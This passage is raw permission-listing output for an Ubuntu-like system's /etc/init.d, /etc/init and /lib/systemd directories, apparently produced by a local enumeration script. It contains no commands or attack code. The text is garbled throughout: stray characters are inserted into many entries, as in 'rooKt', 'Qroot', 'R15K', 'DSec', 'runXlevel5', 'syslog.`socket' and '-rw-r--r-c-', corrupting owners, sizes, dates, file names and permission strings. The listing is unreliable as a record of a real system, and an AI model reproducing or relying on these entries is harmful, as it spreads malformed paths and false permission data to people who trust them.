2802 Nov 17 2017 apport -rwxr-xr-x 1 root root 1071 Dec 6 2015 atd -rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh -rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh -rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh -rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh -rwxr-xr-x 1 root root 1343 Apr 4 2016 console-setup -rwxr-xr-x 1 rooKt root 3049 Apr 5 2016 cron -rwxr-xr-x 1 root root 937 Mar 28 2015 cryptdisks -rwxr-xr-x 1 root root 896 Mar 28 2015 cryptdisks-early -rwxr-xr-x 1 root root 2813 Dec 1 2015 dbus -rwxr-xr-x 1 root root 1105 Mar 15 2016 grub-common -rwxr-xr-x 1 root root 1336 Jan 19 2016 halt -rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh -rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh -rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance -rwxr-xr-x 1 root root 1503 Mar 29 2016 iscsid -rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup.dpkg-bak -rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs -rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod -rwxr-xr-x 1 root root 695 Oct 30 2015 lvm2 -rwxr-xr-x 1 root root 571 Oct 30 2015 lvm2-lvmetad -rwxr-xr-x 1 root root 586 Oct 30 2015 lvm2-lvmpolld -rwxr-xr-x 1 root root 2378 Nov 8 2017 lxcfs -rwxr-xr-x 1 root root 2541 Jun 30 2016 lxd -rwxr-xr-x 1 root root 2365 Oct 9 2017 mdadm -rwxr-xr-x 1 root root 1199 Jul 16 2014 mdadm-waitidleL -rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh -rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh -rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh -rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh -rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh -rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh -rwxr-xr-x 1 root root 5607 Feb 3 2017 mysql -rwxr-xr-x 1 root root 4771 Jul 19 2015 networking -rwxr-xr-x 1 root root 1581 Oct 15 2015 ondemand -rwxr-xr-x 1 root root 2503 Mar 29 2016 open-iscsi -rwxr-xr-x 1 root root 1578 Mar 29 2016 open-vm-tools -rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth -rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log -rwxr-xr-x 1 root root 1192 Sep 6 2015 procps -rwxr-xr-x 1 root root 6366 Jan 19 2016 rc -rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local -rwxr-xr-x 1 root root 117 Jan 19 2016 rcS -rwxr-xr-x 1 root root 661 Jan 19 2016 reboot -rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf -rwxr-xMr-x 1 root root 4355 Jul 10 2014 rsync -rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog -rwxr-xr-x 1 root root 1226 Jun 9 2015 screen-cleanup -rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs -rwxr-xr-x 1 root root 597 Jan 19 2016 single -rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton -rwxr-xr-x 1 root root 4077 Apr 27 2016 ssh -rwxr-xr-x 1 root root 6087 Apr 12 2016 udev -rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw -rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs -rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh -rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot -rwxr-xr-x 1 root root 1391 Apr 20 2017 unattended-upgrades -rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom -rwxr-xr-x 1 root root 1306 May 26 2016 uuidd [-] /etc/init/ config file permissions: total 156 drwxr-xr-x 2 root root 4096 Dec 28 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 338 Apr 8 2016 acpid.conf -rw-r--r-- 1 root root 3709 Mar 3 2017 apparmor.conf N-rw-r--r-- 1 root root 1629 Nov 17 2017 apport.conf -rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf -rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf -rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf -rw-r--r-- 1 root root 412 Mar 28 2015 cryptdisks-udev.conf -rw-r--r-- 1 root root 1519 Mar 28 2015 cryptdisks.conf -rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf -rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf -rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf -rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf -rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf -rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf -rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf -rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf -rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf -rw-r--r-- 1 root root 540 Jun 29 2016 lxcfs.conf -rw-r--r-- 1 root root 813 Jun 30 2016 lxd.conf -rw-r--r-- 1 root root 1757 Feb 3 2017 mysql.conf O-rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf -rw-r--r-- 1 root root 1756 Jun 2 2015 network-interface-security.conf -rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf -rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf -rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf -rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf -rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf -rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf -rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf -rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf -rw-r--r-- 1 root root 641 Apr 27 2016 ssh.conf -rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf -rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf -rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf -rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf -rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf -rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf [-] P/lib/systemd/* config file permissions: /lib/systemd/: total 8.3M drwxr-xr-x 27 root root 36K Dec 28 2017 system drwxr-xr-x 2 root root 4.0K Dec 28 2017 system-shutdown drwxr-xr-x 2 root root 4.0K Dec 28 2017 network drwxr-xr-x 2 root root 4.0K Dec 28 2017 system-generators drwxr-xr-x 2 root root 4.0K Dec 28 2017 system-preset -rwxr-xr-x 1 root root 443K Oct 27 2017 systemd-udevd -rwxr-xr-x 1 root root 55K Oct 27 2017 systemd-activate -rwxr-xr-x 1 root root 103K Oct 27 2017 systemd-bootchart -rwxr-xr-x 1 root root 268K Oct 27 2017 systemd-cgroups-agent -rwxr-xr-x 1 root root 276K Oct 27 2017 systemd-initctl -rwxr-xr-x 1 root root 340K Oct 27 2017 systemd-localed -rwxr-xr-x 1 root root 123K Oct 27 2017 systemd-networkd-wait-online -rwxr-xr-x 1 root root 35K Oct 27 2017 systemd-quotacheck -rwxr-xr-x 1 root root 653K Oct 27 2017 systemd-resolved -rwxr-xr-x 1 root root 91K Oct 27 2017 systemd-rfkill -rwxr-xr-x 1 root root 143K Oct 27 2017 systemd-shutdown -rwxr-xr-x 1 Qroot root 91K Oct 27 2017 systemd-socket-proxyd -rwxr-xr-x 1 root root 51K Oct 27 2017 systemd-sysctl -rwxr-xr-x 1 root root 35K Oct 27 2017 systemd-user-sessions -rwxr-xr-x 1 root root 91K Oct 27 2017 systemd-backlight -rwxr-xr-x 1 root root 47K Oct 27 2017 systemd-binfmt -rwxr-xr-x 1 root root 301K Oct 27 2017 systemd-fsck -rwxr-xr-x 1 root root 75K Oct 27 2017 systemd-fsckd -rwxr-xr-x 1 root root 605K Oct 27 2017 systemd-logind -rwxr-xr-x 1 root root 51K Oct 27 2017 systemd-modules-load -rwxr-xr-x 1 root root 35K Oct 27 2017 systemd-random-seed -rwxr-xr-x 1 root root 51K Oct 27 2017 systemd-remount-fs -rwxr-xr-x 1 root root 31K Oct 27 2017 systemd-reply-password -rwxr-xr-x 1 root root 71K Oct 27 2017 systemd-sleep -rwxr-xr-x 1 root root 333K Oct 27 2017 systemd-timedated -rwxr-xr-x 1 root root 139K Oct 27 2017 systemd-timesyncd -rwxr-xr-x 1 root root 276K Oct 27 2017 systemd-update-utmp -rwxr-xr-x 1 root root 1.6M Oct 27 2017 systemd -rwxr-xr-x 1 root root R15K Oct 27 2017 systemd-ac-power -rwxr-xr-x 1 root root 352K Oct 27 2017 systemd-bus-proxyd -rwxr-xr-x 1 root root 91K Oct 27 2017 systemd-cryptsetup -rwxr-xr-x 1 root root 31K Oct 27 2017 systemd-hibernate-resume -rwxr-xr-x 1 root root 332K Oct 27 2017 systemd-hostnamed -rwxr-xr-x 1 root root 319K Oct 27 2017 systemd-journald -rwxr-xr-x 1 root root 828K Oct 27 2017 systemd-networkd -rwxr-xr-x 1 root root 1.3K Oct 26 2017 systemd-sysv-install drwxr-xr-x 2 root root 4.0K Sep 22 2017 system-sleep /lib/systemd/system: total 956K drwxr-xr-x 2 root root 4.0K Dec 28 2017 sockets.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 getty.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 graphical.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 poweroff.target.wants drwxr-xr-x 2 root root 4.0K DSec 28 2017 reboot.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 rescue.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 resolvconf.service.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 sigpwr.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 timers.target.wants drwxr-xr-x 2 root root 4.0K Dec 28 2017 rc-local.service.d drwxr-xr-x 2 root root 4.0K Dec 28 2017 systemd-timesyncd.service.d drwxr-xr-x 2 root root 4.0K Dec 28 2017 systemd-resolved.service.d drwxr-xr-x 2 root root 4.0K Dec 10 2017 apache2.service.d -rw-r--r-- 1 root root 683 Dec 7 2017 lxd.service -rw-r--r-- 1 root root 206 Dec 7 2017 lxd-bridge.service -rw-r--r-- 1 root root 318 Dec 7 2017 lxd-containers.service -rw-r--r-- 1 root root 197 Dec 7 2017 lxd.socket -rw-r--r-- 1 root root 252 Nov 30 2017 snapd.autoimport.service -rw-r--r-- 1 root root 386 Nov 30 2017 snapd.core-fixup.service -rw-r--r-- 1 root root 290 Nov 30 2017 snapd.refresh.service -rw-r--r-- 1 root root 323 Nov 30 2017 snapd.refresh.timeTr -rw-r--r-- 1 root root 308 Nov 30 2017 snapd.service -rw-r--r-- 1 root root 253 Nov 30 2017 snapd.snap-repair.service -rw-r--r-- 1 root root 281 Nov 30 2017 snapd.snap-repair.timer -rw-r--r-- 1 root root 281 Nov 30 2017 snapd.socket -rw-r--r-- 1 root root 474 Nov 30 2017 snapd.system-shutdown.service -rw-r--r-- 1 root root 246 Nov 28 2017 apport-forward.socket -rw-r--r-- 1 root root 311 Nov 8 2017 lxcfs.service -rw-r--r-- 1 root root 670 Nov 8 2017 mdadm-shutdown.service lrwxrwxrwx 1 root root 21 Oct 27 2017 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 14 Oct 27 2017 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Oct 27 2017 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 checkroot-bootclean.service U-> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 checkroot.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Oct 27 2017 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Oct 27 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Oct 27 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Oct 27 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 24 Oct 27 2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service lrwxrwxrwx 1 root root 24 Oct 27 2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service lrwxrwxrwx 1 root root 25 Oct 27 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service lrwxrwxrwx 1 root root 16 Oct V27 2017 default.target -> graphical.target lrwxrwxrwx 1 root root 9 Oct 27 2017 fuse.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 hwclock.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 killprocs.service -> /dev/null lrwxrwxrwx 1 root root 28 Oct 27 2017 kmod.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 28 Oct 27 2017 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Oct 27 2017 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 W2017 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 mountnfs.service -> /dev/null lrwxrwxrwx 1 root root 22 Oct 27 2017 procps.service -> systemd-sysctl.service lrwxrwxrwx 1 root root 16 Oct 27 2017 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Oct 27 2017 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 reboot.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Oct 27 2017 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Oct 27 2017 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Oct 27 2017 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Oct 27 2017 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Oct 27 2017 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Oct 27 2017 runXlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Oct 27 2017 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Oct 27 2017 sendsigs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 stop-bootlogd-single.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Oct 27 2017 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Oct 27 2017 urandom.service -> systemd-random-seed.service lrwxrwxrwx 1 root root 9 Oct 27 2017 x11-common.service -> /dev/null -rw-r--r-- 1 root root 770 Oct 27 2017 console-getty.service -rw-r--r-- 1 root root 742 Oct 27 2017 console-shell.service -rw-r--r-- 1 root root 791 Oct 27 2017 container-getty@.service -rw-r--r--Y 1 root root 1010 Oct 27 2017 debug-shell.service -rw-r--r-- 1 root root 1009 Oct 27 2017 emergency.service -rw-r--r-- 1 root root 1.5K Oct 27 2017 getty@.service -rw-r--r-- 1 root root 630 Oct 27 2017 initrd-cleanup.service -rw-r--r-- 1 root root 790 Oct 27 2017 initrd-parse-etc.service -rw-r--r-- 1 root root 640 Oct 27 2017 initrd-switch-root.service -rw-r--r-- 1 root root 664 Oct 27 2017 initrd-udevadm-cleanup-db.service -rw-r--r-- 1 root root 677 Oct 27 2017 kmod-static-nodes.service -rw-r--r-- 1 root root 473 Oct 27 2017 mail-transport-agent.target -rw-r--r-- 1 root root 568 Oct 27 2017 quotaon.service -rw-r--r-- 1 root root 612 Oct 27 2017 rc-local.service -rw-r--r-- 1 root root 978 Oct 27 2017 rescue.service -rw-r--r-- 1 root root 1.1K Oct 27 2017 serial-getty@.service -rw-r--r-- 1 root root 653 Oct 27 2017 systemd-ask-password-console.service -rw-r--r-- 1 root root 681 Oct 27 2017 systemd-ask-password-wall.service -rw-r--r-- 1 root root 724 Oct 27 2017 systemd-backlightZ@.service -rw-r--r-- 1 root root 959 Oct 27 2017 systemd-binfmt.service -rw-r--r-- 1 root root 650 Oct 27 2017 systemd-bootchart.service -rw-r--r-- 1 root root 1.0K Oct 27 2017 systemd-bus-proxyd.service -rw-r--r-- 1 root root 497 Oct 27 2017 systemd-exit.service -rw-r--r-- 1 root root 674 Oct 27 2017 systemd-fsck-root.service -rw-r--r-- 1 root root 648 Oct 27 2017 systemd-fsck@.service -rw-r--r-- 1 root root 551 Oct 27 2017 systemd-fsckd.service -rw-r--r-- 1 root root 544 Oct 27 2017 systemd-halt.service -rw-r--r-- 1 root root 631 Oct 27 2017 systemd-hibernate-resume@.service -rw-r--r-- 1 root root 501 Oct 27 2017 systemd-hibernate.service -rw-r--r-- 1 root root 710 Oct 27 2017 systemd-hostnamed.service -rw-r--r-- 1 root root 778 Oct 27 2017 systemd-hwdb-update.service -rw-r--r-- 1 root root 519 Oct 27 2017 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 480 Oct 27 2017 systemd-initctl.service -rw-r--r-- 1 root root 731 Oct 27 2017 systemd-journal-flush.service -rw-r--r--[ 1 root root 1.3K Oct 27 2017 systemd-journald.service -rw-r--r-- 1 root root 557 Oct 27 2017 systemd-kexec.service -rw-r--r-- 1 root root 691 Oct 27 2017 systemd-localed.service -rw-r--r-- 1 root root 1.2K Oct 27 2017 systemd-logind.service -rw-r--r-- 1 root root 693 Oct 27 2017 systemd-machine-id-commit.service -rw-r--r-- 1 root root 967 Oct 27 2017 systemd-modules-load.service -rw-r--r-- 1 root root 685 Oct 27 2017 systemd-networkd-wait-online.service -rw-r--r-- 1 root root 1.3K Oct 27 2017 systemd-networkd.service -rw-r--r-- 1 root root 553 Oct 27 2017 systemd-poweroff.service -rw-r--r-- 1 root root 614 Oct 27 2017 systemd-quotacheck.service -rw-r--r-- 1 root root 717 Oct 27 2017 systemd-random-seed.service -rw-r--r-- 1 root root 548 Oct 27 2017 systemd-reboot.service -rw-r--r-- 1 root root 757 Oct 27 2017 systemd-remount-fs.service -rw-r--r-- 1 root root 907 Oct 27 2017 systemd-resolved.service -rw-r--r-- 1 root root 696 Oct 27 2017 systemd-rfkill.service -rw-r--r-- 1 root \root 497 Oct 27 2017 systemd-suspend.service -rw-r--r-- 1 root root 649 Oct 27 2017 systemd-sysctl.service -rw-r--r-- 1 root root 655 Oct 27 2017 systemd-timedated.service -rw-r--r-- 1 root root 1.1K Oct 27 2017 systemd-timesyncd.service -rw-r--r-- 1 root root 598 Oct 27 2017 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 703 Oct 27 2017 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 683 Oct 27 2017 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 823 Oct 27 2017 systemd-udev-settle.service -rw-r--r-- 1 root root 743 Oct 27 2017 systemd-udev-trigger.service -rw-r--r-- 1 root root 825 Oct 27 2017 systemd-udevd.service -rw-r--r-- 1 root root 757 Oct 27 2017 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 754 Oct 27 2017 systemd-update-utmp.service -rw-r--r-- 1 root root 573 Oct 27 2017 systemd-user-sessions.service -rw-r--r-- 1 root root 528 Oct 27 2017 user@.service -rw-r--r-- 1 root root 403 Oct 27 2017 -.slice -rw-r--r-- 1 root root 879 Oct] 27 2017 basic.target -rw-r--r-- 1 root root 379 Oct 27 2017 bluetooth.target -rw-r--r-- 1 root root 358 Oct 27 2017 busnames.target -rw-r--r-- 1 root root 394 Oct 27 2017 cryptsetup-pre.target -rw-r--r-- 1 root root 366 Oct 27 2017 cryptsetup.target -rw-r--r-- 1 root root 670 Oct 27 2017 dev-hugepages.mount -rw-r--r-- 1 root root 624 Oct 27 2017 dev-mqueue.mount -rw-r--r-- 1 root root 431 Oct 27 2017 emergency.target -rw-r--r-- 1 root root 501 Oct 27 2017 exit.target -rw-r--r-- 1 root root 440 Oct 27 2017 final.target -rw-r--r-- 1 root root 460 Oct 27 2017 getty.target -rw-r--r-- 1 root root 558 Oct 27 2017 graphical.target -rw-r--r-- 1 root root 487 Oct 27 2017 halt.target -rw-r--r-- 1 root root 447 Oct 27 2017 hibernate.target -rw-r--r-- 1 root root 468 Oct 27 2017 hybrid-sleep.target -rw-r--r-- 1 root root 553 Oct 27 2017 initrd-fs.target -rw-r--r-- 1 root root 526 Oct 27 2017 initrd-root-fs.target -rw-r--r-- 1 root root 691 Oct 27 2017 initrd-switch-root.target -rw-^r--r-- 1 root root 671 Oct 27 2017 initrd.target -rw-r--r-- 1 root root 501 Oct 27 2017 kexec.target -rw-r--r-- 1 root root 395 Oct 27 2017 local-fs-pre.target -rw-r--r-- 1 root root 507 Oct 27 2017 local-fs.target -rw-r--r-- 1 root root 405 Oct 27 2017 machine.slice -rw-r--r-- 1 root root 492 Oct 27 2017 multi-user.target -rw-r--r-- 1 root root 464 Oct 27 2017 network-online.target -rw-r--r-- 1 root root 461 Oct 27 2017 network-pre.target -rw-r--r-- 1 root root 480 Oct 27 2017 network.target -rw-r--r-- 1 root root 514 Oct 27 2017 nss-lookup.target -rw-r--r-- 1 root root 473 Oct 27 2017 nss-user-lookup.target -rw-r--r-- 1 root root 354 Oct 27 2017 paths.target -rw-r--r-- 1 root root 552 Oct 27 2017 poweroff.target -rw-r--r-- 1 root root 377 Oct 27 2017 printer.target -rw-r--r-- 1 root root 693 Oct 27 2017 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 603 Oct 27 2017 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 543 Oct 27 2017 reboot.target -rw-r--r-- 1 _root root 396 Oct 27 2017 remote-fs-pre.target -rw-r--r-- 1 root root 482 Oct 27 2017 remote-fs.target -rw-r--r-- 1 root root 486 Oct 27 2017 rescue.target -rw-r--r-- 1 root root 500 Oct 27 2017 rpcbind.target -rw-r--r-- 1 root root 402 Oct 27 2017 shutdown.target -rw-r--r-- 1 root root 362 Oct 27 2017 sigpwr.target -rw-r--r-- 1 root root 420 Oct 27 2017 sleep.target -rw-r--r-- 1 root root 409 Oct 27 2017 slices.target -rw-r--r-- 1 root root 380 Oct 27 2017 smartcard.target -rw-r--r-- 1 root root 356 Oct 27 2017 sockets.target -rw-r--r-- 1 root root 380 Oct 27 2017 sound.target -rw-r--r-- 1 root root 441 Oct 27 2017 suspend.target -rw-r--r-- 1 root root 353 Oct 27 2017 swap.target -rw-r--r-- 1 root root 715 Oct 27 2017 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 719 Oct 27 2017 sys-kernel-config.mount -rw-r--r-- 1 root root 662 Oct 27 2017 sys-kernel-debug.mount -rw-r--r-- 1 root root 518 Oct 27 2017 sysinit.target -rw-r--r-- 1 root root 1.3K Oct 27 2017 syslog.`socket -rw-r--r-- 1 root root 585 Oct 27 2017 system-update.target -rw-r--r-- 1 root root 436 Oct 27 2017 system.slice -rw-r--r-- 1 root root 646 Oct 27 2017 systemd-ask-password-console.path -rw-r--r-- 1 root root 574 Oct 27 2017 systemd-ask-password-wall.path -rw-r--r-- 1 root root 409 Oct 27 2017 systemd-bus-proxyd.socket -rw-r--r-- 1 root root 540 Oct 27 2017 systemd-fsckd.socket -rw-r--r-- 1 root root 524 Oct 27 2017 systemd-initctl.socket -rw-r--r-- 1 root root 607 Oct 27 2017 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.1K Oct 27 2017 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 842 Oct 27 2017 systemd-journald.socket -rw-r--r-- 1 root root 591 Oct 27 2017 systemd-networkd.socket -rw-r--r-- 1 root root 617 Oct 27 2017 systemd-rfkill.socket -rw-r--r-- 1 root root 450 Oct 27 2017 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 578 Oct 27 2017 systemd-udevd-control.socket -rw-r--r-- 1 root root 570 Oct 27 2017 systemd-udevd-kernel.socket -rw-r--r-- a1 root root 395 Oct 27 2017 time-sync.target -rw-r--r-- 1 root root 405 Oct 27 2017 timers.target -rw-r--r-- 1 root root 417 Oct 27 2017 umount.target -rw-r--r-- 1 root root 392 Oct 27 2017 user.slice -rw-r--r-- 1 root root 342 Oct 27 2017 getty-static.service -rw-r--r-- 1 root root 153 Oct 27 2017 sigpwr-container-shutdown.service -rw-r--r-- 1 root root 175 Oct 27 2017 systemd-networkd-resolvconf-update.path -rw-r--r-- 1 root root 715 Oct 27 2017 systemd-networkd-resolvconf-update.service -rw-r--r-- 1 root root 420 Oct 23 2017 resolvconf.service drwxr-xr-x 2 root root 4.0K Sep 22 2017 halt.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 initrd-switch-root.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 kexec.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 busnames.target.wants lrwxrwxrwx 1 root root 9 Sep 22 2017 screen-cleanup.service -> /dev/null lrwxrwxrwx 1 root root 27 Sep 13 2017 plymouth-log.service -> plymouth-read-write.service lrwxrwxrwx 1 root broot 21 Sep 13 2017 plymouth.service -> plymouth-quit.service -rw-r--r-- 1 root root 412 Sep 13 2017 plymouth-halt.service -rw-r--r-- 1 root root 426 Sep 13 2017 plymouth-kexec.service -rw-r--r-- 1 root root 421 Sep 13 2017 plymouth-poweroff.service -rw-r--r-- 1 root root 200 Sep 13 2017 plymouth-quit-wait.service -rw-r--r-- 1 root root 194 Sep 13 2017 plymouth-quit.service -rw-r--r-- 1 root root 244 Sep 13 2017 plymouth-read-write.service -rw-r--r-- 1 root root 416 Sep 13 2017 plymouth-reboot.service -rw-r--r-- 1 root root 532 Sep 13 2017 plymouth-start.service -rw-r--r-- 1 root root 291 Sep 13 2017 plymouth-switch-root.service -rw-r--r-- 1 root root 490 Sep 13 2017 systemd-ask-password-plymouth.path -rw-r--r-- 1 root root 467 Sep 13 2017 systemd-ask-password-plymouth.service -rw-r--r-- 1 root root 155 Sep 5 2017 phpsessionclean.service -rw-r--r-- 1 root root 144 Sep 5 2017 phpsessionclean.timer -rw-r--r-- 1 root root 202 Jun 19 2017 apt-daily-upgrade.service -rw-r--r-c- 1 root root 184 Jun 19 2017 apt-daily-upgrade.timer -rw-r--r-- 1 root root 169 Jun 19 2017 apt-daily.service -rw-r--r-- 1 root root 212 Jun 19 2017 apt-daily.timer -rw-r--r-- 1 root root 189 Jun 14 2017 uuidd.service -rw-r--r-- 1 root root 126 Jun 14 2017 uuidd.socket -rw-r--r-- 1 root root 345 Apr 20 2017 unattended-upgrades.service -rw-r--r-- 1 root root 385 Mar 16 2017 ssh.service -rw-r--r-- 1 root root 216 Mar 16 2017 ssh.socket -rw-r--r-- 1 root root 196 Mar 16 2017 ssh@.service -rw-r--r-- 1 root root 411 Feb 3 2017 mysql.service -rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service -rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service -rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket -rw-r--r-- 1 root root 735 Nov 30 2016 networking.service -rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service -rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service -rw-r--r-- 1 root root 251 Sep 18 2016 open-vm-tools.service -rw-r--r-- 1 root root 285 Jun 16 2016 keyboardd-setup.service -rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null -rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service -rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket -rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service -rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket -rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service -rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket -rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service -rw-r--r-- 1 root 